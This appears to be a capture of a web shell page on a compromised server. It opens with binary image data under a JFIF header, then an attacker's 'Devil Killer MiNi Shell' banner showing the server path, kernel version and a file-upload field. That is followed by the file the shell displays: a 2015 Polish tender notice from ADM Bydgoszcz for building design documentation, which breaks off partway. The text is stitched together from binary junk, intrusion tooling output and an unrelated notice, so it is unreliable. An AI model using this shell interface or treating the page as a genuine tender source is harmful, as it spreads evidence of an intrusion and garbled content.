JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150708/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150708/101543-N-2015.html

<p class="kh_header"><b>Bydgoszcz: 112/P/2015</b><br>
<b>Numer ogłoszenia: 101543 - 2015; data zamieszczenia: 08.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Domów Miejskich "ADM" Spółka z o.o. , ul. Śniadeckich 1, 85-011 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3481600, faks 052 3481607.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.adm.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spólka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 112/P/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej  na rozbiórki budynków, wzmocnienie konstrukcji i ścian budynku oraz wymianę schodów zewnętrznych  dla ADM Sp. z o.o.  w Bydgoszczy.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia zostanie spełniony jeśli Wykonawca wykaże, iż w okresie ostatnich 3 lat przed  dniem wszczęcia  postępowania  o udzielenie  zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - zrealizował należycie zamówienia odpowiadające swoim rodzajem usługom stanowiącym przedmiot niniejszego zamówienia tj. WYKONAŁ co najmniej :
warunek dla zadania nr 1 i nr 2:
* 1 projekt budowlany dotyczący budowy budynku  lub  wzmocnienia  konstrukcji/ścian  budynku
warunek dla zadania nr 3
* 1 projekt budowlany dotyczący rozbiórki  obiektu budowlanego
warunek dla zadania nr 4
* 1 projekt budowlany dotyczący budowy budynku  lub  wzmocnienia  konstrukcji/ścian  budynku  lub  likwidacji zawilgocenia ścian budynku 
warunek dla zadania nr 5:
* 1 projekt budowlany dotyczący budowy lub przebudowy budynku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia zostanie spełniony jeżeli Wykonawca wykaże, że dysponuje minimum:

warunek dotyczy wszystkich zadań:
*osobą posiadającą uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej  zgodnie  z ustawą  z dnia 7 lipca  1994 Prawo budowlane  (Dz. U. 2013r., poz. 1409 ze zm.) lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa, posiadającą aktualne zaświadczenie o wpisie na listę członków właściwej Izby Inżynierów Budownictwa 
UWAGA: 
W przypadku wykonawców zagranicznych dopuszcza się kwalifikacje równoważne do ww. zdobyte w innych państwach,  na zasadach określonych w art.12a ustawy z dnia 7 lipca 1994 r.  Prawo budowlane (tekst jednolity z 2013 r., poz. 1409 ze zmianami).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>warunek dla zadania nr 1 i nr 2:
* 1 projekt budowlany dotyczący budowy budynku  lub  wzmocnienia  konstrukcji/ścian  budynku
warunek dla zadania nr 3
* 1 projekt budowlany dotyczący rozbiórki  obiektu budowlanego
warunek dla zadania nr 4
* 1 projekt budowlany dotyczący budowy budynku  lub  wzmocnienia  konstrukcji/ścian  budynku  lub  likwidacji zawilgocenia ścian budynku 
warunek dla zadania nr 5:
* 1 projekt budowlany dotyczący budowy lub przebudowy budynku;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto wykonawca  zobowiązany jest złożyć wraz z OFERTĄ następujące  dokumenty :
1. w przypadku jeżeli Wykonawca w celu wykazania spełniania warunków udziału w postępowaniu polega na zasobach innych podmiotów - pisemne zobowiązanie (oświadczenie) innych podmiotów do oddania do dyspozycji zasobów niezbędnych do realizacji zamówienia, na okres korzystania z nich przy wykonaniu zamówienia (złożone w  oryginale)
2.  w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo o którym mowa w pkt.7.5. ust.1) niniejszej SIWZ (złożone w oryginale lub notarialnie poświadczonej za zgodność z oryginałem kopii )
3. w przypadku składania oferty przez pełnomocnika Wykonawcy - pełnomocnictwo do reprezentowania wykonawcy przez Pełnomocnika (w oryginale lub notarialnie poświadczonej za zgodność z oryginałem kopii)
4. Podmioty wspólnie ubiegające się o udzielenie zamówienia:
- zgodnie z art.23 uPzp Zamawiający dopuszcza możliwość składania jednej oferty przez dwa lub więcej podmioty/ów jednak pod warunkiem, że taka oferta spełniać będzie następujące wymagania:
1) wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego zobowiązani są ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i do zawarcia umowy - wówczas do oferty należy dołączyć pełnomocnictwo, z którego wynikać będzie zakres umocowania.
2) każdy z wykonawców musi oddzielnie udokumentować - przedkładając dokumenty, o których mowa w pkt.7.2. SIWZ, że nie podlega wykluczeniu na podstawie  art.24 ust.1. ustawy Pzp oraz  złożyć listę kapitałową  albo informację  o tym, że nie należy do grupy kapitałowej,o której mowa w pkt.7.3. SIWZ
3) wykonawcy wspólnie ubiegający się o udzielenie zamówienia winni łącznie spełniać warunki udziału w postępowaniu, o których mowa w art.22 ust.1 ustawy Pzp, a określone przez Zamawiającego w  pkt.6.2. SIWZ
4) oferta musi być podpisana w taki sposób, aby prawnie zobowiązywała wszystkich wykonawców występujących wspólnie,
5) jeżeli oferta wykonawców wspólnie ubiegających się o zamówienie zostanie wybrana jako najkorzystniejsza, Zamawiający przed zawarciem umowy może zażądać przedłożenia umowy regulującej współpracę wykonawców.
5.Formularz oferty - zgodnie ze wzorem stanowiącym załącznik nr 1 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin wykonania - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.adm.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Administracja  Domów Miejskich ADM Sp. z o.o. 
         	Dział  Zamówień Publicznych  
          	85-005 Bydgoszcz  ul. Gdańska 9  (2 piętro, pokój 2).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.07.2015 godzina 11:00, miejsce: Administracja  Domów Miejskich ADM Sp. z o.o. 
         	Dział  Zamówień Publicznych  
          	85-005 Bydgoszcz  ul. Gdańska 9  (2 piętro, pokój 2).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 112/P/2015.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1:  obejmuje wykonanie dokumentacji projektowo-kosztorysowej zwanej dalej dokumentacją - na zabezpieczenie ścian zewnętrznych, stropów budynków mieszkalnych położonych przy ul. Wojska                Polskiego 2b i 2c w Bydgoszczy, w tym remont przejazdu, zgodnie z zaleceniami dotyczącymi sanacji stanu budynków zawartymi w opinii technicznej dotyczącej bezpieczeństwa użytkowania ww. budynków mieszkalnych opracowanej przez p. Zbigniewa Woziwodzkiego wraz z uzyskaniem przez Wykonawcę decyzji                pozwolenia na wykonanie robót budowlanych objętych dokumentacją projektową.
Szczegółowy zakres  zamówienia obejmuje:
1) uzyskanie przez Wykonawcę we własnym zakresie, w ramach wynagrodzenie ofertowego (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) i zebranie wszystkich niezbędnych uzgodnień, pozwoleń, opinii (w tym miejskiego Konserwatora Zabytków jeśli zachodzi taka potrzeba) i               innych dokumentów - niezbędnych Wykonawcy do opracowania dokumentacji projektowej i uzyskania              decyzji pozwolenia na wykonanie robót budowlanych.
2) opracowanie inwentaryzacji architektonicznej i konstrukcyjnej budynku 
3) opracowanie projektu budowlanego w ilości 5 egzemplarzy (w wersji papierowej), zawierającego :
a) warunki BIOZ, wytyczne BHP i  p. poż. 
b) szczegółowy kosztorys inwestorski z podziałem robót na poszczególne budynki: wersja papierowa -                 2 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz.
c) szczegółowy przedmiar robót z podziałem robót na poszczególne budynki jak kosztorys inwestorski:  wersja papierowa - 2 egz., na nośniku elektronicznym - płyta  CD/DVD,  1 egz., 
d) szczegółową specyfikację techniczną wykonania i odbioru robót: wersja papierowa - 2 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz., 
4) uzyskanie (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) decyzji pozwolenia na wykonanie robót objętych projektem. Wniosek należy złożyć do Wydziału Administracji            Budowlanej Urzędu Miasta Bydgoszczy (wzór wniosku oraz karta usługi wydawania decyzji udzielającej            pozwolenia na wykonanie robót jest na stronie UM Bydgoszcz, Wydział Administracji Budowlanej, Referat Architektury).
Zamawiający  określa  wymagany termin realizacji zamówienia:
1) termin wykonania dokumentacji projektowo-kosztorysowej: 60 dni  od daty zawarcia umowy
2) termin dostarczenia Zamawiającemu decyzji pozwolenia na wykonanie robót budowlanych i kompletu dokumentacji: 70 dni od upływu terminu wyznaczonego na wykonanie dokumentacji projektowo- kosztorysowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 130.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin wykonania - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 112/P/2015.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2 : obejmuje wykonanie dokumentacji projektowo-kosztorysowej zwanej dalej dokumentacją - na wzmocnienie konstrukcji budynku oficyny mieszkalnej położonej przy ul. Grudziądzkiej 19  w  Bydgoszczy wraz z uzyskaniem przez Wykonawcę  decyzji pozwolenia na wykonanie robót budowlanych  objętych dokumentacją projektową.
Uwaga: budynek w obszarze objętym miejskim planem zagospodarowania przestrzennego Środmieście-Grudziądzka w Bydgoszczy.
Szczegółowy zakres  zamówienia obejmuje:
1) uzyskanie przez Wykonawcę we własnym zakresie, w ramach wynagrodzenie ofertowego (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) i zebranie wszystkich niezbędnych uzgodnień, pozwoleń, opinii (w tym Miejskiego Konserwatora Zabytków, jeżeli zajdzie taka konieczność) i innych dokumentów - niezbędnych Wykonawcy do opracowania  dokumentacji projektowej i uzyskania                  decyzji pozwolenia na wykonanie robót budowlanych.
2) opracowanie inwentaryzacji architektonicznej i konstrukcyjnej budynku
3) opis zakresu i sposobu prowadzenia wzmocnienia konstrukcji budynku

4) opracowanie projektu budowlanego w ilości 5 egzemplarzy (w wersji papierowej), zawierającego :
a) warunki BIOZ, wytyczne BHP i  p. poż. 
b) szczegółowy kosztorys inwestorski: wersja papierowa - 2 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz., 
c) szczegółowy przedmiar robót:  wersja papierowa - 2 egz., na nośniku elektronicznym - płyta  CD/DVD,  1 egz., 
d) szczegółową specyfikację techniczną wykonania i odbioru robót: wersja papierowa - 2 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz., 
4) uzyskanie (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) decyzji pozwolenia na wykonanie robót objętych projektem. Wniosek należy złożyć do Wydziału Administracji            Budowlanej Urzędu Miasta Bydgoszczy (wzór wniosku oraz karta usługi wydawania decyzji udzielającej            pozwolenia na wykonanie robót jest na stronie UM Bydgoszcz, Wydział Administracji Budowlanej, Referat Architektury).
Zamawiający  określa  wymagany termin realizacji zamówienia:
1) termin wykonania dokumentacji projektowo-kosztorysowej:    60 dni  od daty zawarcia umowy
2) termin dostarczenia Zamawiającemu decyzji pozwolenia na wykonanie robót budowlanych i kompletu dokumentacji: 70 dni od upływu terminu wyznaczonego na wykonanie dokumentacji projektowo- kosztorysowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 130.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin wykonania - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> 112/P/2015.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3: obejmuje wykonanie dokumentacji projektowo-kosztorysowej zwanej dalej dokumentacją - na rozbiórkę oficyny mieszkalnej i zabudowy gospodarczej zlokalizowanych na nieruchomości gminnej przy ul. Grunwaldzkiej 109 w Bydgoszczy (działka nr 65, obręb 63) wraz z uzyskaniem przez Wykonawcę               decyzji pozwolenia na  wykonanie robót rozbiórkowych objętych dokumentacją projektową (w załączeniu plan zagospodarowania przestrzennego wykonany przez Miejską Pracownię Urbanistyczną z zaznaczonymi obiektami do rozbiórki)
Szczegółowy zakres  zamówienia obejmuje:
1) uzyskanie przez Wykonawcę we własnym zakresie, w ramach wynagrodzenie ofertowego (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) i zebranie wszystkich niezbędnych uzgodnień, pozwoleń, opinii i innych dokumentów - niezbędnych Wykonawcy do opracowania dokumentacji projektowej i uzyskania decyzji pozwolenia na wykonanie robót budowlanych.
2) opracowanie opinii ornitologicznej 
3) opracowanie projektu budowlanego w ilości 5 egzemplarzy (w wersji papierowej), zawierającego :
a) warunki BIOZ, wytyczne BHP i  p. poż. 
b) szczegółowy kosztorys inwestorski: wersja papierowa - 2 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz., 
c) szczegółowy przedmiar robót:  wersja papierowa - 2 egz., na nośniku elektronicznym - płyta  CD/DVD,  1 egz., 
d) szczegółową specyfikację techniczną wykonania i odbioru robót: wersja papierowa - 2 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz., 
4) uzyskanie (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) decyzji pozwolenia na rozbiórkę  (wykonanie robót objętych dokumentacją projektową). Wniosek należy złożyć do Wydziału Administracji Budowlanej Urzędu Miasta Bydgoszczy (wzór wniosku oraz karta usługi wydawania decyzji udzielającej pozwolenia na wykonanie robót jest na stronie UM Bydgoszcz, Wydział Administracji  Budowlanej, Referat Architektury).
Zamawiający  określa  wymagany termin realizacji zamówienia:
1)  termin wykonania dokumentacji projektowo-kosztorysowej:  50 dni  od daty zawarcia umowy
2) termin dostarczenia Zamawiającemu decyzji pozwolenia na rozbiórkę i kompletu dokumentacji: 70 dni od upływu terminu wyznaczonego na wykonanie dokumentacji projektowo- kosztorysowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin wykonania - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> 112/P/2015.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 4:  obejmuje wykonanie badań geotechnicznych gruntu i wykonanie dokumentacji projektowo-kosztorysowej w zakresie wzmocnienia elementów budynku przy ul. Sowińskiego 10  i likwidacji zawilgocenia (zgodnie z zaleceniami opracowanej ekspertyzy mykologiczno-budowlanej, w załączeniu)  wraz z uzyskaniem przez Wykonawcę decyzji pozwolenia na wykonanie robót objętych dokumentacją projektową.
Zakres  zamówienia obejmuje:
1) wykonanie badań geotechnicznych gruntu w celu rozeznania warunków posadowienia i fundamentowania budynku ( odkrywki fundamentowe i wiercenia kontrolne)
2) uzyskanie przez Wykonawcę we własnym zakresie, w ramach wynagrodzenie ofertowego (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) i zebranie wszystkich niezbędnych uzgodnień, pozwoleń, opinii  i innych dokumentów - niezbędnych Wykonawcy do opracowania  dokumentacji projektowej i uzyskania decyzji pozwolenia na wykonanie robót budowlanych.
2) opracowanie inwentaryzacji architektonicznej i konstrukcyjnej budynku
3) inwentaryzacja opisowa i fotograficzna uszkodzeń i zawilgocenia budynku 
3) opis zakresu i sposobu wykonania wzmocnienia konstrukcji budynku i likwidacji zawilgocenia
4) opracowanie projektu budowlanego w ilości 5 egzemplarzy (w wersji papierowej), zawierającego :
a) warunki BIOZ, wytyczne BHP i  p. poż. 
b) szczegółowy kosztorys inwestorski: wersja papierowa - 2 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz., 
c) szczegółowy przedmiar robót:  wersja papierowa - 2 egz., na nośniku elektronicznym - płyta  CD/DVD,  1 egz., 
d) szczegółową specyfikację techniczną wykonania i odbioru robót: wersja papierowa - 2 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz., 
